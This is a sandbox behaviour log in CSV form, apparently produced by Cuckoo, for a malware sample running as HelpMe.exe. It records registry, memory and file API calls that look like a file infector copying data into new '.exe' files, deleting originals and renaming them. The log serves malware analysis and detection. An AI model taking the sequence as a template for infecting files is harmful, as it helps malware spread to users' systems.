"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001a8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001b0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->REGDBVersion"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->C:\WINDOWS\Registration\R000000000007.clb","dwDesiredAccess->GENERIC_READ"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->22512"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->REGDBVersion"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00300000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000001"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00300000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00300000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->0x0000014a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->TreatAs"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001c6","hKey->0x0000014a","lpSubKey->(null)"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->0x000001c6","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->0x000001ba","lpSubKey->InprocServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001ca","lpValueName->InprocServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->InprocServerX86"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->LocalServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->0x000001ba","lpSubKey->InprocServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001ca","lpValueName->(null)"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->InprocHandler32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->InprocHandlerX86"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->LocalServer32"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->LocalServer"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->0x000001c6","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001ca","lpValueName->AppID"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->0x000001c6","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->0x000001c6","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->0x000001ba","lpSubKey->InprocServer32"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001ca","lpValueName->ThreadingModel"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001ba","lpSubKey->TreatAs"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001c8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x000001c8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->Generation"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ce","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001ca","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001ca","lpValueName->DriveMask"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001cc","lpValueName->AllowFileCLSIDJunctions"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->61440"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->47554"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->47554"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->71"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->71"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->268"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToWrite->268"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\additional\.gitignore"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x0000011c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000011c","lpValueName->Personal"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x0000011c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.313","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x0000011c","lpValueName->Personal","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents","cbData->100"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000011c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->0x0000011c","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e4","lpValueName->Generation"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\additional\.gitignore.exe","lpNewFileName->C:\cuckoo\additional\.gitignore"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000013c","lpFileName->C:\cuckoo\dll\cmonitor.dll","dwDesiredAccess->GENERIC_READ"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->268"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000013c","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000011c","lpFileName->C:\cuckoo\dll\cmonitor.dll","dwDesiredAccess->GENERIC_READ"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000140","lpFileName->C:\cuckoo\dll\cmonitor.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.323","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->61440"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000013c","nNumberOfBytesToRead->47554"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000140","nNumberOfBytesToWrite->47554"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000001d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d0","lpValueName->Common Documents"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x000001d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001d0","lpValueName->Common Documents","dwType->1","lpData->C:\Documents and Settings\All Users\Documents","cbData->92"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001d0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->0x000001d0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->Generation"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.333","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000011c","nNumberOfBytesToRead->61440"
